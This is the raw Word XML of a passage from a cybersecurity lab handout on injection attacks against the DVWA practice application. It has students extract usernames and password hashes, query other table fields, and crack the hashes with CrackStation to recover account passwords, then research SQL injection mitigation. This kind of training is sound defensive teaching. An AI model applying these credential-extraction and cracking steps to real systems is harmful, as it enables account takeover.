        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5CA474AF">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">After the list of </w:t>
      </w:r>
      <w:r w:rsidR="00AA3212" w:rsidRPr="5CA474AF">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">users, </w:t>
      </w:r>
      <w:r w:rsidR="009E2F9A" w:rsidRPr="5CA474AF">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">you should see several results with usernames and what </w:t>
      </w:r>
      <w:r w:rsidR="317DFC2F" w:rsidRPr="5CA474AF">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>appear</w:t>
      </w:r>
      <w:r w:rsidR="009E2F9A" w:rsidRPr="5CA474AF">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> to be password hashes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17BEA148" w14:textId="3CD82B2F" w:rsidR="00871FCA" w:rsidRDefault="00871FCA" w:rsidP="003D4BBC">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Question:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFC240A" w14:textId="6482945A" w:rsidR="00AA3212" w:rsidRPr="00750A25" w:rsidRDefault="00AA3212" w:rsidP="003D4BBC">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00750A25">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Which account </w:t>
      </w:r>
      <w:r w:rsidR="00457476" w:rsidRPr="00750A25">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>could be</w:t>
      </w:r>
      <w:r w:rsidRPr="00750A25">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> the most valuable in our </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="35C499D8" w:rsidRPr="00750A25">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="00750A25">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>nt</w:t>
      </w:r>
      <w:r w:rsidR="78F43CEF" w:rsidRPr="00750A25">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidRPr="00750A25">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>est</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00750A25">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:r w:rsidR="00076C9F" w:rsidRPr="00750A25">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> Explain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A993CA5" w14:textId="12FA642C" w:rsidR="00457476" w:rsidRPr="0079570D" w:rsidRDefault="00076C9F" w:rsidP="003D4BBC">
      <w:pPr>
        <w:pStyle w:val="AnswerLineL50"/>
      </w:pPr>
      <w:r>
        <w:t>Type your answers here.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D2DF3E" w14:textId="31BC852B" w:rsidR="00B53CBA" w:rsidRDefault="00391664" w:rsidP="00F63CF5">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
      </w:pPr>
      <w:r w:rsidRPr="00F63CF5">
        <w:t xml:space="preserve">Try crafting queries to display the contents of other fields in the table by </w:t>
      </w:r>
      <w:r w:rsidR="0009504D" w:rsidRPr="00F63CF5">
        <w:t>varying the column names based on the names previously displayed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28753160" w14:textId="77777777" w:rsidR="00F63CF5" w:rsidRDefault="00F63CF5" w:rsidP="00B5734A">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Question:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43AB3A5C" w14:textId="2C54BC91" w:rsidR="00274C3A" w:rsidRPr="00750A25" w:rsidRDefault="00864FBD" w:rsidP="00B5734A">
      <w:pPr>
        <w:pStyle w:val="BodyTextL50"/>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00750A25">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">What is the difference between the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00750A25">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>user_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00750A25">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00750A25">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r w:rsidRPr="00750A25">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> fields?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFD5240" w14:textId="77777777" w:rsidR="00F63CF5" w:rsidRPr="0079570D" w:rsidRDefault="00F63CF5" w:rsidP="00B5734A">
      <w:pPr>
        <w:pStyle w:val="AnswerLineL50"/>
      </w:pPr>
      <w:r>
        <w:t>Type your answers here.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A04928" w14:textId="2448B3E9" w:rsidR="00417FE2" w:rsidRDefault="00417FE2" w:rsidP="00417FE2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Hack the password hashes</w:t>
      </w:r>
      <w:r w:rsidR="006020E6">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="402D0C55" w14:textId="0F846353" w:rsidR="00417FE2" w:rsidRPr="00417FE2" w:rsidRDefault="00417FE2" w:rsidP="00417FE2">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Open an</w:t>
      </w:r>
      <w:r w:rsidR="00B53CBA">
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ther browser </w:t>
      </w:r>
      <w:r w:rsidR="00B53CBA">
        <w:t xml:space="preserve">tab </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and navigate to </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidR="00324F92" w:rsidRPr="00BE4669">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://crackstation.net</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00324F92">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3EEA8E" w14:textId="64D2B1DC" w:rsidR="00417FE2" w:rsidRPr="005674D4" w:rsidRDefault="00417FE2" w:rsidP="00417FE2">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CrackStation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is a free online password hash cracker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B8FC9C" w14:textId="35750999" w:rsidR="00417FE2" w:rsidRDefault="00417FE2" w:rsidP="00417FE2">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Copy and paste the password hash from DVWA into </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>CrackStation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00177321">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> and click </w:t>
      </w:r>
      <w:r w:rsidR="00177321" w:rsidRPr="00177321">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Crack Hashes</w:t>
      </w:r>
      <w:r w:rsidR="00177321">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B87A683" w14:textId="66EE564F" w:rsidR="00887E76" w:rsidRPr="005674D4" w:rsidRDefault="00887E76" w:rsidP="00471F90">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Questions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014F960B" w14:textId="41F6C781" w:rsidR="00257B4D" w:rsidRPr="00750A25" w:rsidRDefault="00257B4D" w:rsidP="00D366E4">
      <w:pPr>
        <w:pStyle w:val="BodyTextL50"/>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00750A25">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>What is the password of the admin account?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1158B341" w14:textId="77777777" w:rsidR="00887E76" w:rsidRPr="00257B4D" w:rsidRDefault="00887E76" w:rsidP="00887E76">
      <w:pPr>
        <w:pStyle w:val="AnswerLineL50"/>
      </w:pPr>
      <w:r w:rsidRPr="001106A2">
        <w:t>&lt;Type your answer here&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454D6E94" w14:textId="0407091D" w:rsidR="002D0DD0" w:rsidRPr="00750A25" w:rsidRDefault="002D0DD0" w:rsidP="00274C3A">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00750A25">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">What is the password for the user </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E05EB4" w:rsidRPr="00750A25">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="00750A25">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>ablo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00750A25">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B9DD76" w14:textId="77777777" w:rsidR="00887E76" w:rsidRPr="00257B4D" w:rsidRDefault="00887E76" w:rsidP="00887E76">
      <w:pPr>
        <w:pStyle w:val="AnswerLineL50"/>
      </w:pPr>
      <w:r w:rsidRPr="001106A2">
        <w:t>&lt;Type your answer here&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15AE2DE5" w14:textId="5743AD16" w:rsidR="00905288" w:rsidRDefault="00EE00D9" w:rsidP="00905288">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Research </w:t>
      </w:r>
      <w:r w:rsidR="00905288">
        <w:t>SQL Injection Mitigation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C7DED6" w14:textId="6D5F847B" w:rsidR="00146352" w:rsidRDefault="00146352" w:rsidP="00146352">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Conduct online research on SQL injection mitigation</w:t>
      </w:r>
      <w:r w:rsidR="0066653C">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF3A1FD" w14:textId="4FE4C9F4" w:rsidR="00146352" w:rsidRPr="00146352" w:rsidRDefault="00146352" w:rsidP="00146352">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Open a web browser and search SQL injection mitigation and SQL injection prevention</w:t>
      </w:r>
      <w:r w:rsidR="00240C9D">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6FF70E" w14:textId="6F6B7C19" w:rsidR="00146352" w:rsidRPr="00417FE2" w:rsidRDefault="00146352" w:rsidP="00146352">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Take notes on your mitigation and prevention findings.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="054F3FB9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Reflection</w:t>
      </w:r>
      <w:r w:rsidR="00075EA9">
        <w:t xml:space="preserve"> Questions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4100959E" w14:textId="718C237E" w:rsidR="00146352" w:rsidRPr="00750A25" w:rsidRDefault="00146352" w:rsidP="00871FCA">
      <w:pPr>
        <w:pStyle w:val="BodyTextL25"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00750A25">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>What are three mitigation methods for preventing SQL injection exploits</w:t>
      </w:r>
      <w:r w:rsidR="00320D45" w:rsidRPr="00750A25">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266040D6" w14:textId="4E7893C8" w:rsidR="00603503" w:rsidRDefault="00C87039" w:rsidP="00871FCA">
      <w:pPr>
        <w:pStyle w:val="AnswerLineL25"/>
      </w:pPr>
      <w:r>
        <w:t>Type</w:t>
      </w:r>
      <w:r w:rsidR="00070C16">
        <w:t xml:space="preserve"> your answers here.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01FAAFB7" w14:textId="5CCEBADC" w:rsidR="005D3357" w:rsidRPr="002C3300" w:rsidRDefault="003568E7" w:rsidP="006F7731">
      <w:pPr>
        <w:pStyle w:val="ConfigWindow"/>
      </w:pPr>
      <w:r w:rsidRPr="006F7731">
        <w:t>End of document</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="005D3357" w:rsidRPr="002C3300" w:rsidSect="009C318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0FB5" w14:textId="77777777" w:rsidR="000E59A6" w:rsidRDefault="000E59A6" w:rsidP="00710659">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7B61BA" w14:textId="77777777" w:rsidR="000E59A6" w:rsidRDefault="000E59A6"/>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="026F0E27" w14:textId="77777777" w:rsidR="000E59A6" w:rsidRDefault="000E59A6" w:rsidP="00710659">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
    <w:p w14:paraId="797E8D09" w14:textId="77777777" w:rsidR="000E59A6" w:rsidRDefault="000E59A6"/>
  </w:endnote>
  <w:endnote w:type="continuationNotice" w:id="1">
    <w:p w14:paraId="16C8ADAE" w14:textId="77777777" w:rsidR="000E59A6" w:rsidRDefault="000E59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4942" w14:textId="77777777" w:rsidR="007664E4" w:rsidRDefault="007664E4" w:rsidP="00BB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893B" w14:textId="11B4864E" w:rsidR="00926CB2" w:rsidRPr="00882B63" w:rsidRDefault="008E00D5" w:rsidP="00BB7804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8917B7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967EA8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720C" w14:textId="71C1204F" w:rsidR="00882B63" w:rsidRPr="00882B63" w:rsidRDefault="00882B63" w:rsidP="00BB7804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8917B7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967EA8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FB6F" w14:textId="77777777" w:rsidR="000E59A6" w:rsidRDefault="000E59A6" w:rsidP="00710659">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A96C3AB" w14:textId="77777777" w:rsidR="000E59A6" w:rsidRDefault="000E59A6"/>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="54C63519" w14:textId="77777777" w:rsidR="000E59A6" w:rsidRDefault="000E59A6" w:rsidP="00710659">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
    <w:p w14:paraId="52EFD5B9" w14:textId="77777777" w:rsidR="000E59A6" w:rsidRDefault="000E59A6"/>
  </w:footnote>
  <w:footnote w:type="continuationNotice" w:id="1">
    <w:p w14:paraId="1BB6B94C" w14:textId="77777777" w:rsidR="000E59A6" w:rsidRDefault="000E59A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5397B707046445088B2ABE892006AD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BD88148" w14:textId="084C2125" w:rsidR="00926CB2" w:rsidRDefault="00007304" w:rsidP="008402F2">
        <w:pPr>
          <w:pStyle w:val="PageHead"/>
        </w:pPr>
        <w:r>
          <w:t>Lab - Injection Attacks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B2C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9136E4A" wp14:editId="697AC2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NEiF3mD" int2:invalidationBookmarkName="" int2:hashCode="Vr85kskMbGPKFQ" int2:id="FRGOjwY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5898914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579556152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745341872">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1846704982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740100398">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1755203588">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="163937381">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="102081809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463085194">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1029842570">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1054888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31602">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="227618777">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1101954885">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="97214356">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="1341005345">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="1212039184">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="1318993859">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="1292051014">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="17898591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C"/>
    <w:rsid w:val="00001BDF"/>
    <w:rsid w:val="0000380F"/>
    <w:rsid w:val="00004175"/>
    <w:rsid w:val="000059C9"/>
    <w:rsid w:val="00007304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408C7"/>
    <w:rsid w:val="000408E4"/>
    <w:rsid w:val="00041AF6"/>
    <w:rsid w:val="00043DA9"/>
    <w:rsid w:val="00044E62"/>
    <w:rsid w:val="00050BA4"/>
    <w:rsid w:val="0005141D"/>
    <w:rsid w:val="00051738"/>
    <w:rsid w:val="00052351"/>
    <w:rsid w:val="0005242B"/>
    <w:rsid w:val="00052548"/>
    <w:rsid w:val="00060696"/>
    <w:rsid w:val="00062D89"/>
    <w:rsid w:val="000671C4"/>
    <w:rsid w:val="00067A67"/>
    <w:rsid w:val="00070C16"/>
    <w:rsid w:val="00075EA9"/>
    <w:rsid w:val="00076847"/>
    <w:rsid w:val="000769CF"/>
    <w:rsid w:val="00076C9F"/>
    <w:rsid w:val="00080AD8"/>
    <w:rsid w:val="000815D8"/>
    <w:rsid w:val="00084C99"/>
    <w:rsid w:val="00085CC6"/>
    <w:rsid w:val="00087D0F"/>
    <w:rsid w:val="00090C07"/>
    <w:rsid w:val="0009147A"/>
    <w:rsid w:val="00091E8D"/>
    <w:rsid w:val="0009207E"/>
    <w:rsid w:val="0009353E"/>
    <w:rsid w:val="0009378D"/>
    <w:rsid w:val="0009504D"/>
    <w:rsid w:val="00097163"/>
    <w:rsid w:val="000A22C8"/>
    <w:rsid w:val="000A28C3"/>
    <w:rsid w:val="000A3223"/>
    <w:rsid w:val="000A40A4"/>
    <w:rsid w:val="000B2344"/>
    <w:rsid w:val="000B36BF"/>
    <w:rsid w:val="000B7DE5"/>
    <w:rsid w:val="000C2118"/>
    <w:rsid w:val="000C333E"/>
    <w:rsid w:val="000C5EF2"/>
    <w:rsid w:val="000C6425"/>
    <w:rsid w:val="000C6E6E"/>
    <w:rsid w:val="000C7B7D"/>
    <w:rsid w:val="000D55B4"/>
    <w:rsid w:val="000D5CE8"/>
    <w:rsid w:val="000E174D"/>
    <w:rsid w:val="000E1B69"/>
    <w:rsid w:val="000E5523"/>
    <w:rsid w:val="000E59A6"/>
    <w:rsid w:val="000E65F0"/>
    <w:rsid w:val="000F072C"/>
    <w:rsid w:val="000F2074"/>
    <w:rsid w:val="000F31D7"/>
    <w:rsid w:val="000F6743"/>
    <w:rsid w:val="000F7459"/>
    <w:rsid w:val="001006C2"/>
    <w:rsid w:val="00101BE8"/>
    <w:rsid w:val="00103401"/>
    <w:rsid w:val="00103A44"/>
    <w:rsid w:val="00103D36"/>
    <w:rsid w:val="0010436E"/>
    <w:rsid w:val="00107494"/>
    <w:rsid w:val="00107B2B"/>
    <w:rsid w:val="001106A2"/>
    <w:rsid w:val="00112AC5"/>
    <w:rsid w:val="001133DD"/>
    <w:rsid w:val="00120CBE"/>
    <w:rsid w:val="00121BAE"/>
    <w:rsid w:val="00122111"/>
    <w:rsid w:val="00125806"/>
    <w:rsid w:val="001261C4"/>
    <w:rsid w:val="001263C7"/>
    <w:rsid w:val="00130A20"/>
    <w:rsid w:val="001314FB"/>
    <w:rsid w:val="00131683"/>
    <w:rsid w:val="00135782"/>
    <w:rsid w:val="001366EC"/>
    <w:rsid w:val="00136DDB"/>
    <w:rsid w:val="00141812"/>
    <w:rsid w:val="0014219C"/>
    <w:rsid w:val="001425ED"/>
    <w:rsid w:val="001433C1"/>
    <w:rsid w:val="00143450"/>
    <w:rsid w:val="00144997"/>
    <w:rsid w:val="00145550"/>
    <w:rsid w:val="00146352"/>
    <w:rsid w:val="001523C0"/>
    <w:rsid w:val="001535FE"/>
    <w:rsid w:val="00153A84"/>
    <w:rsid w:val="00154E3A"/>
    <w:rsid w:val="00155352"/>
    <w:rsid w:val="00157902"/>
    <w:rsid w:val="00162105"/>
    <w:rsid w:val="00162EEA"/>
    <w:rsid w:val="00163164"/>
    <w:rsid w:val="001652BC"/>
    <w:rsid w:val="00166253"/>
    <w:rsid w:val="001662E4"/>
    <w:rsid w:val="001704B7"/>
    <w:rsid w:val="001708A6"/>
    <w:rsid w:val="001710C0"/>
    <w:rsid w:val="00172AFB"/>
    <w:rsid w:val="00174D6F"/>
    <w:rsid w:val="00176866"/>
    <w:rsid w:val="001772B8"/>
    <w:rsid w:val="00177310"/>
    <w:rsid w:val="00177321"/>
    <w:rsid w:val="00177B76"/>
    <w:rsid w:val="001805FF"/>
    <w:rsid w:val="00180FBF"/>
    <w:rsid w:val="001813C3"/>
    <w:rsid w:val="00182CF4"/>
    <w:rsid w:val="00186216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2462"/>
    <w:rsid w:val="001B67D8"/>
    <w:rsid w:val="001B6F95"/>
    <w:rsid w:val="001C05A1"/>
    <w:rsid w:val="001C1D9E"/>
    <w:rsid w:val="001C5998"/>
    <w:rsid w:val="001C5BCD"/>
    <w:rsid w:val="001C763F"/>
    <w:rsid w:val="001C7C3B"/>
    <w:rsid w:val="001D13B5"/>
    <w:rsid w:val="001D58B8"/>
    <w:rsid w:val="001D5B6F"/>
    <w:rsid w:val="001D7CC8"/>
    <w:rsid w:val="001E0AB8"/>
    <w:rsid w:val="001E2EF7"/>
    <w:rsid w:val="001E32D4"/>
    <w:rsid w:val="001E3777"/>
    <w:rsid w:val="001E38E0"/>
    <w:rsid w:val="001E38F3"/>
    <w:rsid w:val="001E4E72"/>
    <w:rsid w:val="001E62B3"/>
    <w:rsid w:val="001E6424"/>
    <w:rsid w:val="001E6AB6"/>
    <w:rsid w:val="001F0171"/>
    <w:rsid w:val="001F0D77"/>
    <w:rsid w:val="001F643A"/>
    <w:rsid w:val="001F7DD8"/>
    <w:rsid w:val="0020022B"/>
    <w:rsid w:val="0020057C"/>
    <w:rsid w:val="00201928"/>
    <w:rsid w:val="00203A6F"/>
    <w:rsid w:val="00203E26"/>
    <w:rsid w:val="0020449C"/>
    <w:rsid w:val="00204ED2"/>
    <w:rsid w:val="002113B8"/>
    <w:rsid w:val="00215665"/>
    <w:rsid w:val="002163BB"/>
    <w:rsid w:val="0021792C"/>
    <w:rsid w:val="00220909"/>
    <w:rsid w:val="00223205"/>
    <w:rsid w:val="002240AB"/>
    <w:rsid w:val="00225E37"/>
    <w:rsid w:val="00225FB0"/>
    <w:rsid w:val="00231DCA"/>
    <w:rsid w:val="00233F4D"/>
    <w:rsid w:val="00235792"/>
    <w:rsid w:val="002364EE"/>
    <w:rsid w:val="00236B76"/>
    <w:rsid w:val="00236ED2"/>
    <w:rsid w:val="00237666"/>
    <w:rsid w:val="00237B59"/>
    <w:rsid w:val="00240C9D"/>
    <w:rsid w:val="00242E3A"/>
    <w:rsid w:val="002438B2"/>
    <w:rsid w:val="00246492"/>
    <w:rsid w:val="00247671"/>
    <w:rsid w:val="00247F44"/>
    <w:rsid w:val="002506CF"/>
    <w:rsid w:val="0025107F"/>
    <w:rsid w:val="00251F07"/>
    <w:rsid w:val="00255AAD"/>
    <w:rsid w:val="00257B4D"/>
    <w:rsid w:val="00260637"/>
    <w:rsid w:val="00260CD4"/>
    <w:rsid w:val="002639D8"/>
    <w:rsid w:val="00265F77"/>
    <w:rsid w:val="00266C83"/>
    <w:rsid w:val="00270FCC"/>
    <w:rsid w:val="002729A8"/>
    <w:rsid w:val="0027352E"/>
    <w:rsid w:val="00274C3A"/>
    <w:rsid w:val="002768DC"/>
    <w:rsid w:val="00294C8F"/>
    <w:rsid w:val="002A01BB"/>
    <w:rsid w:val="002A0B2E"/>
    <w:rsid w:val="002A0DC1"/>
    <w:rsid w:val="002A22E9"/>
    <w:rsid w:val="002A6C56"/>
    <w:rsid w:val="002B0B9B"/>
    <w:rsid w:val="002B72F7"/>
    <w:rsid w:val="002C02F2"/>
    <w:rsid w:val="002C04C4"/>
    <w:rsid w:val="002C090C"/>
    <w:rsid w:val="002C1243"/>
    <w:rsid w:val="002C1815"/>
    <w:rsid w:val="002C475E"/>
    <w:rsid w:val="002C5882"/>
